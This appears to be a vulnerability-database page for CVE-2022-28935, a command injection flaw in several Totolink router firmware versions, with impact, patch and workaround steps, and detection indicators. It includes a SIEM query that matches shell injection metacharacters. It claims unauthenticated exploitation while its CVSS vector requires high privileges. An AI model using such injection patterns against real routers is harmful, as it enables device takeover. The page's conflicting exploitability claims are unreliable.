Login Sign Up

CVE-2022-28935

7.2 HIGH
Remote Code Execution

📋 TL;DR

This CVE describes a command injection vulnerability in multiple Totolink router models that allows attackers to execute arbitrary commands on affected devices. The vulnerability affects specific firmware versions of Totolink A830R, A3100R, A950RG, A800R, A3000RU, and A810R routers. Attackers can exploit this to gain unauthorized access and control over the router.

💻 Affected Systems

Products:
  • Totolink A830R
  • Totolink A3100R
  • Totolink A950RG
  • Totolink A800R
  • Totolink A3000RU
  • Totolink A810R
Versions: Specific firmware versions: A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, A810R V4.1.2cu.5182_B20201026
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Affects specific firmware versions only. Other versions may or may not be vulnerable.

📦 What is this software?

A3000ru Firmware by Totolink

View all CVEs affecting A3000ru Firmware →

A3100r Firmware by Totolink

View all CVEs affecting A3100r Firmware →

A800r Firmware by Totolink

View all CVEs affecting A800r Firmware →

A810r Firmware by Totolink

View all CVEs affecting A810r Firmware →

A830r Firmware by Totolink

View all CVEs affecting A830r Firmware →

A950rg Firmware by Totolink

View all CVEs affecting A950rg Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of router with persistent backdoor installation, credential theft, network traffic interception, and lateral movement to connected devices.

🟠

Likely Case

Router takeover leading to DNS hijacking, credential harvesting, and network disruption.

🟢

If Mitigated

Limited impact if routers are behind firewalls with restricted WAN access and proper network segmentation.

🌐 Internet-Facing: HIGH - Routers are typically internet-facing devices, making them directly accessible to attackers.
🏢 Internal Only: MEDIUM - Internal attackers could exploit if they gain network access, but external exposure is primary concern.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Command injection vulnerabilities are typically easy to exploit with publicly available tools. The provided Google Drive links likely contain exploit details.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No official vendor advisory found

Restart Required: Yes

Instructions:

1. Check Totolink website for firmware updates
2. Download appropriate firmware for your model
3. Access router admin interface
4. Navigate to firmware upgrade section
5. Upload and apply new firmware
6. Reboot router

🔧 Temporary Workarounds

Disable Remote Management

all

Prevent external access to router administration interface

Network Segmentation

all

Isolate routers in separate network segment with strict firewall rules

🧯 If You Can't Patch

  • Replace affected routers with patched or different vendor models
  • Implement strict network access controls and monitor for suspicious activity

🔍 How to Verify

Check if Vulnerable:

Check router firmware version in admin interface against affected versions list

Check Version:

Login to router admin interface and check System Status or Firmware Information page

Verify Fix Applied:

Verify firmware version has been updated to a version not in the affected list

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution in system logs
  • Multiple failed login attempts followed by successful access
  • Unexpected configuration changes

Network Indicators:

  • Unusual outbound connections from router
  • DNS queries to suspicious domains
  • Port scanning originating from router

SIEM Query:

source="router_logs" AND (command="*;*" OR command="*|*" OR command="*`*" OR command="*$(*)")

📊 Metadata

CVE ID: CVE-2022-28935
CVSS v3 Score: 7.2 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-77
Published: July 6, 2022
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-28935, you might also want to check these:

CVE-2024-48841 10.0

This critical vulnerability in FLXEON software allows remote attackers to execute arbitrary code wit...

Same vulnerability type (CWE-77)
CVE-2025-59818 10.0

This vulnerability allows authenticated attackers to execute arbitrary system commands by manipulati...

Same vulnerability type (CWE-77)
CVE-2024-28354 10.0

This is a critical command injection vulnerability in TRENDnet TEW-827DRU routers that allows remote...

Same vulnerability type (CWE-77)